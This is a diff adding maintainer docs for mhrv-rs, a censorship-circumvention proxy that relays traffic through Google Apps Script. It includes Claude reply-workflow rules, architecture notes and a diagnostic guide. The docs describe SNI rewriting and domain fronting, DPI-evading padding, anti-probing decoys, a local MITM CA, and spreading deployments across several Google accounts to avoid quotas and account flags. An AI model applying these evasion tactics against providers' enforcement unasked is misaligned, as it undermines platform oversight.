+ +### The reply marker + +Every substantive issue or PR comment ends with this exact footer (with a literal `---` HR before it): + +``` +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +This is non-negotiable. Users in this community recognize the marker. It signals that the reply was drafted by Claude and reviewed by the maintainer before posting. Don't omit it, don't paraphrase it, don't translate "reviewed by" into Persian. + +### Persian or English: match the user + +If the user wrote in Persian, reply in Persian. If they wrote in English, reply in English. If they mixed (common), match the dominant language. Never assume Iranian users want English — many are more comfortable in Persian and the message lands better in their language. + +Code blocks, command examples, technical terms (`AUTH_KEY`, `script_id`, `parallel_concurrency`), URLs, and the reply marker always stay in their original Latin form. Don't translate them. + +### Public artifact tone + +Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Persian or English, adjust to the user. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient. + +### Semver discipline + +The project uses `vX.Y.Z` strictly: +- **X (major)** — currently `1`. Bump only on a true ABI/protocol break with the Apps Script side. +- **Y (minor)** — feature batch. Bump when shipping a coherent set of features (e.g. v1.7 → v1.8). +- **Z (patch)** — small fix or single-feature addition that doesn't justify a minor bump. Most releases are patch bumps. + +Patch releases (v1.8.1, v1.8.2, v1.8.3) ship continuously — every time something user-visible lands. Don't sit on completed work; releases are cheap and Iranian users who ask "when's the fix shipping?" deserve "in the next 30 minutes" not "next week". 
The release CI is fast (~30 min from tag push to Telegram publish). + +### Persian-then-English changelog + +Every changelog file in `docs/changelog/vX.Y.Z.md` follows this exact format: + +```markdown + +• [bullet 1 in Persian] +• [bullet 2 in Persian] +--- +• [same bullet 1 in English] +• [same bullet 2 in English] +``` + +Persian comes first because the userbase is majority-Persian. The English version is for international contributors and the public repo audience. Both versions cover the same content but are written natively in each language — not machine-translated. + +### When to close issues + +Close immediately: +- **Resolved** — user confirmed fix works (`gh issue close N --reason completed`) +- **Duplicate** — point to canonical thread (`gh issue close N --reason "not planned"`) +- **Architectural limit** — feature can't be implemented due to Apps Script restrictions (close with explanation, mark as `not planned`) + +Keep open: +- **Tracking** — issue serves as canonical reference for a roadmap item (e.g., #313 for ISP throttle, #300 for SABR cliff, #420 for dual-VPS docs) +- **Awaiting user verification** — a fix/workaround was posted, waiting for user to confirm +- **Active diagnostic** — back-and-forth with user gathering data + +When closing as duplicate, always include the canonical issue number in the close comment so future readers can navigate. + +## DOPR (Daily Open PR + Issue Triage) cycle + +For "do DOPR", "check issues", "issues, prs", or similar requests, the workflow is: + +1. **List open PRs**: `gh pr list --state open --limit 20` +2. **List recently-updated issues**: `gh issue list --state open --limit 30 --search "sort:updated-desc"` +3. **For each PR**: review the diff, check CI, decide merge/comment/decline. New PRs from new accounts that look like supply-chain-pattern (typosquat, "update requirements.txt" with weird deps, rebrand-and-replace) get declined politely. 
Substantive code from known contributors generally gets merged after a local `cargo test --lib` + build. See `references/contributors.md` for who's known. +4. **For each issue updated since last DOPR**: read the latest comments. If there's a new user message, reply substantively (not just "thanks, will look into it"). If there's user confirmation that a fix worked, close the issue. If you've been waiting on user data and they haven't responded for several days, the issue can stay open or be closed with "Closing for now; reopen if it's still happening." (use judgment). +5. **If anything user-visible landed**: cut a patch release. Don't batch up 5 PRs into one big release — ship one at a time. +6. **For each new substantive issue**: write a real reply. Default to writing it in a temp file (e.g., `/tmp/r-<issue>-<slug>.md`) and posting via `gh issue comment N --body-file ...` (avoids HEREDOC quoting hell with backticks and `$()`). + +DOPR replies should not be templated. Use the issue-patterns reference to recognize the situation, then write a reply that addresses _this user's specific report_ — their log lines, their config, their setup. Templated replies are easy to spot and erode trust. + +## Operational guardrails + +- **Don't merge PRs without local verification** — `git fetch && gh pr checkout N && cargo test --lib && cargo build --release`. CI doesn't run tests on PRs in this repo (only the release-drafter), so local verification is the real gate. +- **Don't push to `main` while a release is mid-flight** — `release.yml` auto-fires on tag push and races with subsequent commits. Wait for the release CI to complete before merging more PRs. +- **Don't skip the `--reason` flag on `gh issue close`** — `completed` for resolved, `not planned` for duplicates and architectural limits. +- **Don't update `docs/changelog/` for already-released versions** — the file is the historical record of what shipped. New work goes into a new file for the next version. 
+- **Don't share AUTH_KEYs, TUNNEL_AUTH_KEYs, or deployment IDs** that a user posted in an issue. They might think they obfuscated them, but if they didn't, don't quote them back. If you need to reference them, use `YOUR_AUTH_KEY` / `<YOUR_DEPLOYMENT_ID>` placeholders. diff --git a/docs/maintainer/assets/changelog-template.md b/docs/maintainer/assets/changelog-template.md new file mode 100644 index 00000000..e5f8ffd2 --- /dev/null +++ b/docs/maintainer/assets/changelog-template.md @@ -0,0 +1,8 @@ + +• [توضیح bullet اول به فارسی، با link به issue/PR — مثال: ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) از @contributor)]: شرح آنچه تغییر کرده + چرا اهمیت داره. اطلاعات معماری مرتبط، مقادیر default، و escape hatch‌ها برای کاربرانی که می‌خواهن behavior قدیم رو نگه دارن +• [bullet دوم — همین structure: تغییر + چرا + escape hatch] +• [اگر breaking change وجود داره: **شکستگی سازگاری**: شرح breaking + migration steps] +--- +• [bullet 1 in English ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) by @contributor): description of what changed and why it matters. 
Architectural context, default values, and escape hatch for users who want to preserve old behavior] +• [bullet 2 in English with the same structure: change + why + escape hatch] +• [if breaking change: **Breaking change**: description + migration steps] diff --git a/docs/maintainer/assets/reply-marker.md b/docs/maintainer/assets/reply-marker.md new file mode 100644 index 00000000..37d98b40 --- /dev/null +++ b/docs/maintainer/assets/reply-marker.md @@ -0,0 +1,2 @@ +--- +[reply via Anthropic Claude | reviewed by @therealaleph] diff --git a/docs/maintainer/references/architecture.md b/docs/maintainer/references/architecture.md new file mode 100644 index 00000000..476b01df --- /dev/null +++ b/docs/maintainer/references/architecture.md @@ -0,0 +1,122 @@ +# Architecture + +## What mhrv-rs is + +mhrv-rs is the Rust port of [`masterking32/MasterHttpRelayVPN`](https://github.com/masterking32/MasterHttpRelayVPN) (Python). It's an HTTP proxy that runs locally on the user's machine (Windows / macOS / Linux / Android, with OpenWRT and Raspbian builds for sidecars) and bridges browser/app traffic out through Google Apps Script. + +The architectural unlock: from the user's ISP perspective, all traffic looks like normal HTTPS to a Google IP. ISPs that censor by SNI / domain / TLS-fingerprint can't block the relay without breaking Google access for their entire customer base. ISPs that censor by destination IP can't block it either, because the destinations are Google data centers. + +Apps Script's `UrlFetchApp.fetch()` is the workhorse — it's a Google-blessed API for outbound HTTPS, and Google effectively runs an open proxy to the rest of the internet on every Apps Script user's behalf. 
+ +## Two operating modes + +### apps_script mode (default) + +``` +client app → mhrv-rs HTTP/SOCKS5 listener → + MITM (intercepts HTTPS, signs with local CA) → + POST batch to Apps Script Web App → + Apps Script's UrlFetchApp.fetch() → upstream destination → + Apps Script returns body → mhrv-rs returns to client +``` + +- **Code.gs** (in `assets/apps_script/Code.gs`) is the script the user deploys to their own Google account at `script.google.com`. Each deployment gets a `script_id` like `AKfycbz1abc...`. +- The MITM layer signs HTTPS leaf certs on the fly using a CA installed in the user's trust store. This lets mhrv-rs read the plaintext request, batch it through Apps Script, and return the response to the client. +- All upstream protocols are HTTP/HTTPS. **No UDP, no MTProto, no QUIC, no WebRTC.** Apps Script can't carry them. +- Per-Apps-Script-account quota: ~20,000 UrlFetchApp calls/day, 30 concurrent, 6-min per-invocation cap, 30s soft response cliff. + +### Full mode + +``` +client app → mhrv-rs SOCKS5 → + signal/control via Apps Script (small JSON RPC) → + Apps Script calls into tunnel-node container on user's VPS → + tunnel-node opens TCP socket to upstream → + bytes flow through tunnel-node ↔ Apps Script ↔ mhrv-rs ↔ client +``` + +- **CodeFull.gs** (in `assets/apps_script/CodeFull.gs`) is a different Apps Script — replaces Code.gs's local-fetch with calls to a tunnel-node container. +- **tunnel-node** is a small axum-based Rust HTTP server (in `tunnel-node/`) that the user runs on their own VPS via Docker. Image: `ghcr.io/therealaleph/mhrv-tunnel-node:latest`. +- The bytes flow through the actual TCP tunnel between tunnel-node and the upstream server — Apps Script only handles the **signaling** for tunnel session lifecycle. This means Apps Script's 30s response cap doesn't apply to long-running connections (no SABR cliff). Bigger uploads/downloads work. 
+- Trade-off: requires a VPS ($3-5/month from Hetzner/Contabo/OVH/Parspack), more setup steps, three places to keep AUTH_KEYs in sync. +- The VPS does NOT need to be reachable from Iran directly. Apps Script (running in Google's data center) is the one that talks to the VPS, so the user's ISP only sees the user-to-Apps-Script leg, which is Google IPs. + +## The three secrets + +These are the constant source of user confusion. Get the names right: + +| Secret | Lives where | Must match | Notes | +|--------|-------------|------------|-------| +| `AUTH_KEY` (or `auth_key` in mhrv-rs config.json) | mhrv-rs `config.json` ↔ `Code.gs`/`CodeFull.gs` | Both ends | Per-deployment user secret; protects against random people hitting the user's deployment URL. Editing it in Code.gs without **redeploying as a new version** in Apps Script is the single most common user mistake. | +| `TUNNEL_AUTH_KEY` | `CodeFull.gs` ↔ tunnel-node container env var | Both ends | Full mode only. Env var name is **literally `TUNNEL_AUTH_KEY`** — uppercase, with underscores, exact string. Several users have written `MHRV_AUTH_KEY` (wrong) or `Tunnel` (wrong); the env var is case-sensitive in Linux/Docker and any deviation falls back to the default `changeme`. | +| `DIAGNOSTIC_MODE` | `Code.gs` and `CodeFull.gs` (constant at top) | n/a — local toggle | When `false` (default), the script returns a benign HTML decoy (`"The script completed but did not return anything"`) for bad-auth requests, mimicking Apps Script's own placeholder. When `true`, returns explicit JSON `{"e":"unauthorized"}`. The decoy mode is anti-active-probing defense (#357 pattern); diagnostic mode is for setup. | + +## Apps Script's hidden constraints + +These are constraints Google enforces on Apps Script's `UrlFetchApp.fetch()` that shape what mhrv-rs can and can't do: + +1. **Self-loop restriction** — `UrlFetchApp.fetch()` blocks calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. 
**Google services are unreachable through apps_script mode by design.** Includes `gmail.com`, `meet.google.com`, `colab.research.google.com`, `drive.google.com`, `script.google.com` itself (ironic — you can't proxy your way to manage your own deployment). Workaround for users with VPS: dual-routing in xray (route Google direct from VPS, everything else through mhrv-rs). Without VPS, no workaround — point users at #420. +2. **30-second response cliff** — Apps Script Web Apps have a soft cap of 30s on the response. Long downloads or video streams (YouTube SABR, large file downloads >50 MB through MITM) get truncated. Tracked as #300 (SABR cliff). v1.9.0 xmux roadmap aims to mitigate by splitting across deployments. +3. **6-minute per-invocation cap** — hard limit. After this, `UrlFetchApp.fetch()` throws and Apps Script kills the request. +4. **30 concurrent executions per Apps Script account** — affects users who put the same `script_id` under heavy load. Lower `parallel_concurrency` in mhrv-rs config to avoid hitting this. +5. **Daily quota: 20,000 UrlFetchApp calls per Google account** — resets at 00:00 UTC. Multi-deployment rotation across multiple Google accounts is the workaround. +6. **Per-100s rolling soft quota** — undocumented but consistently observed. When tripped, returns the placeholder body (one of the 6 candidate causes for the placeholder; see `diagnostic-taxonomy.md`). +7. **Localized error pages** — Apps Script returns its placeholder body in the locale of the deploying account or origin IP. For Iranian users, this means a Persian HTML page. v1.8.3 detection now distinguishes this case. + +## The MITM CA + +To intercept HTTPS in apps_script mode, mhrv-rs runs a per-machine CA: + +- Generated on first run, stored at `/ca/ca.crt` and `ca.key`. +- Installed into the user's OS trust store via the `cert_installer` module. +- On Windows: user-trust store via `certutil -addstore`. +- On macOS: login keychain via `security`. 
+- On Linux: distro-specific (NSS for Firefox, system bundle for Chrome/curl). +- **On Android**: only the **user trust store**, not system. Most apps (YouTube, Gmail, Telegram, Instagram, banking) only trust the system store, so they don't see mhrv-rs. Chrome/Firefox/Edge browsers explicitly opt in to user trust and DO use mhrv-rs. This is the Android user-trust-store gotcha that drives much of the Android UX confusion. Workaround for power users: root + Magisk + MagiskTrustUserCerts module migrates user CA to system. + +The `--remove-cert` CLI flag tears down the CA cleanly (uninstall from trust store + delete files). PR #121 from `dazzling-no-more` added this; lives in `src/main.rs` `remove_cert` flow. + +## SNI rewriting + google_ip rotation + +The TLS handshake between mhrv-rs and Apps Script does: + +- **TCP connect** to `google_ip` (default `216.239.38.120` — a Google edge IP) +- **TLS SNI** = `www.google.com` (rewritten — this is what the ISP sees in cleartext) +- **HTTP Host header** = `script.google.com` (the real destination, hidden inside the encrypted tunnel) + +Iran ISPs occasionally filter specific Google IPs (#313 pattern). When this happens, the user can rotate `google_ip` to another IP from `DEFAULT_GOOGLE_SNI_POOL` (the 12-entry list in `src/domain_fronter.rs`). `mhrv-rs scan-ips` is a diagnostic command that probes Google IPs from the user's network and reports which ones complete TLS handshakes. + +`scan_config.json` (separate from main `config.json`) is the input for `mhrv-rs scan-ips` — users sometimes confuse the two and put the scan config where the main config should be. See `issue-patterns.md`. + +## v1.8.0 anti-fingerprinting features + +- **Random padding** (`_pad` field, 0-1024 bytes uniform random, base64) — defeats DPI length-distribution fingerprinting. Users on heavily-throttled ISPs can disable with `disable_padding: true` (~25% bandwidth savings) — landed in v1.8.1. 
+- **Auto-blacklist deployments** that timeout repeatedly (#319) — round-robin pool actively excludes failing deployments for a cooldown period. Tunable strike threshold queued for v1.8.x. +- **Decoy responses** for bad-auth requests — see `DIAGNOSTIC_MODE` above. +- **Active-probing defense** — random benign body on `doGet` requests so a probe to the deployment URL doesn't reveal that it's a relay. + +## v1.8.3 features (just shipped) + +- **DoH bypass** — DNS-over-HTTPS to Cloudflare/Google/Quad9/AdGuard/etc. routes around the Apps Script tunnel via plain TCP/443. Saves ~2s per DNS lookup. Default on; opt out with `tunnel_doh: true`. +- **H1 container keepalive** — 240s ping to prevent Apps Script V8 cold-start stalls. Visible win for YouTube playback after pause. +- **64 KB header cap with HTTP 431** — replaces silent socket drops that caused browser retry loops on oversized headers. +- **Spreadsheet-backed response cache** in Code.gs (opt-in via `CACHE_SPREADSHEET_ID`) — TTL-aware, Vary-aware, circular-buffer for O(1) writes. Reduces UrlFetchApp quota consumption. + +## Key files in the repo + +- `src/main.rs` — CLI binary entry point. `init_logging()` reads `config.log_level`. `Cmd::Test`, `Cmd::ScanIps`, etc. as subcommands. +- `src/bin/ui.rs` — UI binary entry (Windows + Android via JNI). Shares lib code via `mhrv_rs::*`. The `install_ui_tracing` function (post-v1.8.2) reads `RUST_LOG > config.log_level > info,hyper=warn`. +- `src/lib.rs` — re-exports for the lib + Android JNI shim. +- `src/domain_fronter.rs` — the SNI-rewrite TLS dialer + the `DomainFronter` orchestrator. `DEFAULT_GOOGLE_SNI_POOL` lives here. +- `src/proxy_server.rs` — HTTP/SOCKS5 listeners, dispatch logic, DoH bypass, MITM mode entry. +- `src/tunnel_client.rs` — Full mode batch client. Decoy detection + script_id-in-logs added v1.8.1; softer 6-cause message v1.8.3. +- `src/mitm/` — MITM cert manager. +- `src/cert_installer/` — per-OS trust store installation logic. 
+- `src/config.rs` — `Config` struct + JSON serde. Default values, validation. +- `assets/apps_script/Code.gs` and `CodeFull.gs` — server-side scripts. Edit these and tell users to redeploy as new version in Apps Script. +- `tunnel-node/` — separate Rust crate for the Full-mode VPS container. README + README.fa.md (Persian translation). +- `android/app/src/main/java/com/therealaleph/mhrv/` — Android Kotlin glue. `MhrvVpnService.kt` is the VPNService that calls into Rust via JNI. `ConfigStore.kt` is the form/preferences round-trip. +- `docs/changelog/` — versioned changelog files. Format: Persian, then `---`, then English. +- `.github/workflows/release.yml` — release CI: builds for all platforms, attaches to GitHub release. +- `.github/workflows/telegram-publish-files.yml` — fires on `workflow_run` of release.yml; posts each file individually to the Telegram channel `-1003966234444` with Persian captions, SHA-256 in caption, and a cross-link from the main channel. +- `.github/scripts/telegram_publish_files.py` — stdlib-only Python script that does the actual Telegram posting (no `requests` dep so it works in minimal CI runners). diff --git a/docs/maintainer/references/contributors.md b/docs/maintainer/references/contributors.md new file mode 100644 index 00000000..1330fd5f --- /dev/null +++ b/docs/maintainer/references/contributors.md @@ -0,0 +1,126 @@ +# Contributor ecosystem + +The project's substantive contributors fall into a few specialty domains. Knowing who-does-what lets you tag the right reviewer, weight feedback appropriately, and route new design decisions to the people most likely to have informed opinions. + +## Project owner + +### @therealaleph + +Maintainer. Final authority on architectural decisions, release timing, what merges. Persian/English bilingual. Replies that go through Claude carry the marker `[reply via Anthropic Claude | reviewed by @therealaleph]` and are reviewed before posting. 
+ +## Core community contributors + +These are the contributors whose substantive PRs and reports have shaped the project's roadmap. When designing features that touch their domain, tag them for review. + +### @w0l4i + +**Domain**: deep diagnostic feedback, architectural insight, persistence on hard bugs. + +**Notable contributions**: +- Drove the v1.8.1 → v1.8.2 → v1.8.3 evolution of decoy detection. Reported the false-positive in v1.8.1 that led to the 4-cause taxonomy (then 5-cause, then 6-cause). +- Reported the Persian-localized quota body case (#404) after multiple iterations through wrong hypotheses (third-party relay → Iranian VPS appliance → Hetzner DE → Apps Script account locale). +- Suggested the v1.8.x "per-deployment auto-throttle" feature (AIMD style) with detailed rationale. +- Suggested the v1.9.0 xmux roadmap items: byte-range slipstreaming across deployments, MTU/packet-size optimization, per-deployment burst limits. +- Drove the v1.8.x DNS architecture redesign by pointing out that Iranian DNS providers (Shecan, 403) perform DNS hijacking and poisoning — they cannot be trusted as privacy-preserving alternatives (see #449). + +**How to engage**: +- Reports are detailed and self-correct fast as data comes in +- Setups tend to be advanced (multiple deployments, Hetzner VPS, Full mode) +- Tag as a core reviewer for v1.9.0 xmux design issue when filed +- Communication: English + +### @2bemoji + +**Domain**: roadmap design discussions, particularly for QUIC blocking and DNS optimization. 
+ +**Notable contributions**: +- Drove the design of `block_quic` 3-state UI toggle (off / drop / reject with ICMP unreachable for instant Happy Eyeballs failover) in #361 / #377 +- Surfaced the mobile-accessibility framing for `block_quic` (config-only is "Linux desktop only" for users who can't easily edit Android's `/data/data/...` config) + +**How to engage**: +- Tag for Android UI batch decisions, especially anything touching QUIC / DNS / network-layer toggles +- Tag for v1.9.0 xmux design as a core reviewer +- Communication: English + +### @ipvsami / Sam Ashouri + +**Domain**: advanced Full mode setups, dual-VPS topologies, account suspension reports. + +**Notable contributions**: +- Reported the Iranian-VPS xray entry topology in #420 (Iranian VPS as xray entry, German VPS as tunnel-node exit) — drove the dual-routing-xray design discussion +- Reported the Google account flag pattern in #421 (phone-less new accounts, "action required" notifications, Workspace landing HTML on flagged deployments) — drove the v1.8.x detection for the 6th cause in the diagnostic taxonomy + +**How to engage**: +- Comfortable with VPS / xray / network routing; explanations can assume that level +- Tag for v1.9.0 xmux design as a core reviewer +- Communication: English + +### @dazzling-no-more + +**Domain**: code contributor — substantive Rust PRs. + +**Notable contributions**: +- PR #121 (`--remove-cert` flag for clean CA teardown) +- PR #359 (Google Drive queue tunnel mode — community-testing, awaiting cleanup confirmation) +- PR #438 (H1 container keepalive + 431 oversized headers + clearer port-collision message — merged in v1.8.3) +- PR #439 (DoH bypass for Cloudflare/Google/Quad9/etc. 
on TCP/443 — merged in v1.8.3) +- PR #446 (tunnel-node long-poll raised to 15s, adaptive straggler settle — merged in v1.8.4) + +**How to engage**: +- PRs tend to be self-contained with tests and clean diffs +- Address review feedback substantively — they iterate based on reviewer comments +- Tag for v1.9.0 xmux design as a core reviewer (could potentially contribute the implementation) +- Communication: English + +### @euvel + +**Domain**: code contributor — Apps Script (Code.gs) features. + +**Notable contributions**: +- Designed the spreadsheet-backed response cache (#400 design discussion → PR #443 implementation) +- All 5 review suggestions from the design discussion implemented in PR #443: TTL-aware caching, 35 KB body-size gate, header rewriting on hit, circular buffer for O(1) writes, Vary-aware compound cache keys + +**How to engage**: +- Apps Script JavaScript expertise; consider tagging for any future Code.gs changes +- Communication: English + +## Adjacent projects + +### @masterking32 + +Original Python project (`masterking32/MasterHttpRelayVPN`). mhrv-rs is the Rust port; the project periodically cherry-picks stability/feature commits from masterking32. PR #438 in v1.8.3 was a batch of three such cherry-picks. Not a direct contributor here, but the project's design parent. + +### @denuitt1 + +Maintainer of `denuitt1/mhr-cfw` — Cloudflare Workers backend that aims to be Apps Script-compatible. Independent project, not officially endorsed. Tracked in #380 / #393 for compatibility audit. Not a direct contributor here. + +### @g3ntrix, @mehrad-mz + +Authors of forks/branches on the Python project that occasionally have valuable commits to cherry-pick (see #430 for the audit list). + +## Tagging conventions + +When tagging in a comment: + +- Reviewer requests: "@dazzling-no-more — would you mind reviewing this approach?" 
+- Cross-references: "see [#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404) where @w0l4i described this" +- Recognition: "this drove the design — thanks @euvel for the detailed initial proposal" +- For v1.9.0 xmux design issue specifically (when it's filed): tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers + +Don't ping people gratuitously; each ping should have a clear ask or recognition. + +## Project history context + +The project predates this repo as `masterking32/MasterHttpRelayVPN` (Python). The Rust port was started for performance + cross-platform binary distribution. Apps Script protocol stayed compatible across both, and we periodically cherry-pick from upstream Python. v1.7.x represented the initial port stabilization; v1.8.x is the "DPI evasion + diagnostics + community-contribution batch"; v1.9.0 will be the xmux flagship. + +Canonical "long" issues for context: +- #313 — Iran ISP throttle, primary tracking issue +- #300 — SABR cliff, primary tracking for video streaming limit +- #310 — VPS setup help, primary tracking for setup questions +- #333 — VPS / Full mode / Iranian-network workarounds +- #420 — dual-VPS topology, primary tracking for advanced Full mode +- #382 — Cloudflare error patterns +- #325 — community-shared deployment workflow +- #361 / #377 — Android UI batch + QUIC blocking design +- #369 — v1.9.0 xmux design (RFC, not yet filed as the formal design issue) +- #449 — DNS architecture redesign (post-Shecan correction) diff --git a/docs/maintainer/references/diagnostic-taxonomy.md b/docs/maintainer/references/diagnostic-taxonomy.md new file mode 100644 index 00000000..35b8b6f8 --- /dev/null +++ b/docs/maintainer/references/diagnostic-taxonomy.md @@ -0,0 +1,161 @@ +# Diagnostic taxonomy: the placeholder body + +## What this is + +Multiple distinct conditions cause Apps Script (or our own scripts on Apps Script) to return an HTML body that mhrv-rs's batch parser sees as `bad response: no 
json in batch response: `. Through user reports and iteration we've narrowed the body strings to **6 candidate causes**. Distinguishing them requires both client-side detection (string-match on body content) and server-side disambiguation (`DIAGNOSTIC_MODE` flag in Code.gs). + +This taxonomy is the post-mortem evolution of v1.8.0 → v1.8.1 → v1.8.2 → v1.8.3 detection. v1.8.1 falsely asserted "AUTH_KEY mismatch" on body match; v1.8.2 softened to enumerate 4 candidates; v1.8.3 added the Persian-localized cause and the Workspace landing HTML cause for account-flagged deployments — bringing the count to 6. + +## The 6 candidate causes + +### 1. AUTH_KEY mismatch (intentional decoy) + +**Body**: +```html + + +Web App +

The script completed but did not return anything.

+ +``` + +**Source**: Our `Code.gs` / `CodeFull.gs` returns this when `request.k !== AUTH_KEY` and `DIAGNOSTIC_MODE = false`. It mimics Apps Script's stock placeholder for empty-return scripts. + +**Trigger**: User edited AUTH_KEY in Apps Script editor but didn't redeploy as new version, OR user has different AUTH_KEY in `config.json` than in `Code.gs`, OR user is using Code.gs deployment ID with `mode: full` (which expects CodeFull.gs). + +**Disambiguator**: Set `DIAGNOSTIC_MODE = true` in Code.gs / CodeFull.gs + redeploy as new version. Then this case returns `{"e":"unauthorized"}` (explicit JSON) instead of the HTML. The other 5 cases are independent of DIAGNOSTIC_MODE and still return their natural body. + +**Fix**: Align AUTH_KEY values + redeploy as new version. + +### 2. Apps Script execution timeout + +**Body**: same `"The script completed but did not return anything"` HTML, but emitted by Apps Script itself (not our script) when the execution exceeded the per-invocation cap. + +**Source**: Apps Script's runtime kills the script after 6-min hard cap or 30s soft cap on Web App responses, then serves the placeholder body. + +**Trigger**: Slow upstream destination, large response payload, network stall mid-fetch. + +**Disambiguator**: With `DIAGNOSTIC_MODE = true`, AUTH_KEY mismatch (cause 1) goes away; if the placeholder body still appears for some batches, it's likely cause 2/3/4/5/6. + +**Fix**: Lower `parallel_concurrency` in `config.json`, retry, accept some intermittent failures. + +### 3. Apps Script soft-quota tear + +**Body**: same placeholder HTML. Sometimes a different short HTML page mentioning Apps Script's quota system. + +**Source**: Apps Script's per-100s rolling soft quota or per-account daily quota hit. Apps Script kills the request mid-execution. + +**Trigger**: Account-aggregate UrlFetchApp throughput exceeded per-100s threshold (~30 concurrent or so). 
Common with multi-device single-deployment users during page load events (browsers fire 50+ requests in a burst). + +**Disambiguator**: Same as 2 — DIAGNOSTIC_MODE rules out AUTH_KEY but doesn't distinguish 2 from 3 from 4. Check the per-script_id error rate over a few minutes — if a deployment has 30%+ failure rate during peak browser activity but works fine when idle, it's quota-related (3 or possibly 5). + +**Fix**: Lower `parallel_concurrency`, add more deployments to `script_ids` rotation, distribute deployments across multiple Google accounts. + +### 4. Iran ISP-side response truncation + +**Body**: typically truncated mid-stream — the body that arrives at mhrv-rs is missing the trailing JSON envelope. The early bytes look like a valid Apps Script response prefix but the request was cut by an ISP-side TCP RST mid-flight. + +**Source**: Iran's ISP infrastructure (especially TCI/مخابرات) actively RST-injects on TLS connections to specific Google IPs (the #313 pattern). + +**Trigger**: Network-conditional. Active throttle periods (sometimes hours, sometimes days). Worse on certain Google IPs. Worse on certain Iranian ISPs. + +**Disambiguator**: Direct curl test from the user's network (see `issue-patterns.md` Pattern 3). If curl-to-Apps-Script also gets timeouts/RST, confirmed ISP-side. The HTML body in this case is partial/truncated — sometimes just ` + + + ... +``` + +May also include phrases like `از سهمیه پهنای باند مجاز فراتر رفته‌اید` ("you exceeded the allowed bandwidth quota") and `مقدار انتقال داده را کمتر کنید` ("reduce data transfer volume"). + +**Source**: Apps Script itself. Apps Script localizes its system error pages based on the deploying Google account's locale (fa-IR for Persian) and/or the request-origin IP. + +**Trigger**: Account is Persian-locale (common for Iranian users) AND hit a quota threshold (cause 3) OR an internal Google-side hiccup. 
+ +**Disambiguator**: With `DIAGNOSTIC_MODE = true`, cause 1 returns explicit JSON; if Persian HTML still appears, it's not our script — it's Apps Script's own response. + +**Important**: w0l4i's case in #404 traced through several wrong hypotheses before landing here: +- Initially diagnosed as AUTH_KEY mismatch → no, mixed success/failure on same `script_id` +- Then diagnosed as third-party relay (`g.workstream.ir` looks Iranian) → no, w0l4i clarified it's his own tunnel +- Then diagnosed as Iranian VPS provider appliance → no, Hetzner Nuremberg +- Final landing: Apps Script's own Persian-localized quota response based on Google account locale + +This iteration is documented because the false starts are instructive — don't lock in on the first hypothesis. + +**Fix**: Same as cause 3 (it's a quota issue presenting as Persian HTML). + +### 6. Workspace landing HTML for account-flagged deployments + +**Body**: +```html + + + ... +``` + +The body is Google Workspace's landing page (the description "Word web processing, presentations, and spreadsheets" is the standard tagline for Google Docs/Sheets/Slides). It's served by Apps Script when the deployment owner's Google account is in a flagged state (post-warning, pre-suspension). + +**Source**: Apps Script refuses to execute the deployed script when the owning account is restricted, and serves the Workspace landing page as a "log in" prompt instead. + +**Trigger**: Account is in stage 1b or stage 2 of the suspension progression (see `issue-patterns.md` Pattern 8). Often correlates with phone-less new accounts that ignored the "action required" prompt. + +**Disambiguator**: Owner of the deployment can log in to Google → see if there are pending warnings or restrictions. If yes → fix the account (add phone) or rotate the deployment to a healthier account. + +**Fix**: Account-side, not config-side. Add phone verification, OR move to a different deployment owner via #325 workflow. 
+ +## v1.8.3 detection logic + +```rust +// In src/tunnel_client.rs around line 893+ +if err_msg.contains("The script completed but did not return anything") { + tracing::error!( + "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \ + could be (1) AUTH_KEY mismatch (run a direct curl probe against \ + the deployment to verify), (2) Apps Script execution timeout or \ + per-100s quota tear (try lowering parallel_concurrency), \ + (3) Apps Script internal hiccup (transient, retry next batch), \ + or (4) ISP-side response truncation (#313 pattern, try a \ + different google_ip). To distinguish (1) from the rest: set \ + DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new \ + version — only AUTH_KEY mismatch returns this body in diagnostic \ + mode.", + sid_short + ); +} +``` + +This is the v1.8.2 string. v1.8.3 adds detection for the Persian quota body and the Workspace landing HTML as separate paths. + +## When responding to users showing this log + +The right response shape is: + +1. **Acknowledge** the log line they pasted +2. **Enumerate** the 6 (or 4-5 in older versions) candidate causes briefly +3. **Identify the most likely** for their specific case using context clues: + - Single-deployment user, fresh setup → likely cause 1 (AUTH_KEY) + - Mixed success/failure on same script_id → NOT cause 1 (AUTH_KEY would fail 100%) + - "Worked yesterday, broken today" → likely cause 4 (ISP throttle) or cause 6 (account flag in progression) + - High concurrency / many devices on one deployment → likely cause 3 (quota) or cause 5 (Persian quota variant) + - Persian HTML body → cause 5 or 6 + - Hetzner/Iranian VPS Full-mode user → check if VPS is actually Iranian (provider appliance is real for Iranian VPS only) +4. **Give the disambiguator**: DIAGNOSTIC_MODE flip + redeploy +5. **Give the immediate workaround** appropriate to the most-likely cause + +Don't claim certainty before disambiguator data. 
